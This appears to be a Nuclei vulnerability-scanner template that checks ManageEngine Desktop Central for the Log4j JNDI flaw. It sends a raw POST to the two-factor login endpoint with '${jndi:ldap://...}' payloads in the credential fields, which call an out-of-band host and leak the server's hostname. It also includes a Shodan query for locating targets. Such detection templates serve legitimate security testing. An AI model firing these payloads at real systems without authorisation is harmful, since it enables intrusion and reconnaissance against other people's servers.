nuclei-templates/http/vulnerabilities/other/manage-engine-dc-log4j-rce....

67 lines
2.6 KiB
YAML
Raw Normal View History

2023-10-18 20:00:15 +00:00
id: manage-engine-dc-log4j-rce
info:
name: Manage Engine Desktop Central - Remote Code Execution (Apache Log4j)
2023-10-19 07:28:29 +00:00
author: shaikhyaser
2023-10-18 20:00:15 +00:00
severity: critical
description: |
Manage Engine Endpoint Central (formerly Desktop Central) is susceptible to Log4j JNDI remote code execution. Endpoint Central is a Unified Endpoint Management (UEM) & Endpoint protection suite that helps manage and secure various network devices
reference:
- https://pitstop.manageengine.com/portal/en/community/topic/log4j-security-issue
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
2024-09-10 08:22:50 +00:00
cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:*
2023-10-18 20:00:15 +00:00
metadata:
max-request: 1
shodan-query: title:"ManageEngine Desktop Central"
2024-09-10 08:22:50 +00:00
product: manageengine_desktop_central
vendor: zohocorp
2023-10-18 20:00:15 +00:00
tags: cve,cve2021,rce,jndi,log4j,manage,engine,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
2023-10-19 07:28:29 +00:00
str: "{{rand_base(5)}}"
2023-10-18 20:00:15 +00:00
http:
- raw:
- |
POST /two_fact_auth HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Referer: {{RootURL}}/configurations
Content-Type: application/x-www-form-urlencoded
2023-10-19 07:28:29 +00:00
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&j_password=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&otpTimeout=7&browserLocale=en_us&cacheNum=4&csrfPreventionSaltForFlashMessage=
2023-10-18 20:00:15 +00:00
matchers-condition: and
matchers:
- type: word
2023-11-09 09:14:13 +00:00
part: interactsh_protocol # Confirms the DNS Interaction
2023-10-18 20:00:15 +00:00
words:
- "dns"
- type: regex
part: interactsh_request
regex:
2023-11-09 09:14:13 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
2023-10-18 20:00:15 +00:00
extractors:
- type: kval
kval:
2023-11-09 09:14:13 +00:00
- interactsh_ip # Print remote interaction IP in output
2023-10-18 20:00:15 +00:00
- type: regex
group: 2
regex:
2023-11-09 09:14:13 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
2023-10-18 20:00:15 +00:00
part: interactsh_request
- type: regex
group: 1
regex:
2023-11-09 09:14:13 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
2023-10-18 20:00:15 +00:00
part: interactsh_request
2024-09-12 05:14:01 +00:00
# digest: 4a0a00473045022009bc260c64dfa96ea2898fbde8f5861b8e6a5786dab29eb74829e4b01f5fb434022100a1cf5ee2b8e5d29cde38b0edf0ffdab839368c9f3f962d35e9831086a974d8aa:922c64590222798bb761d5b6d8e72950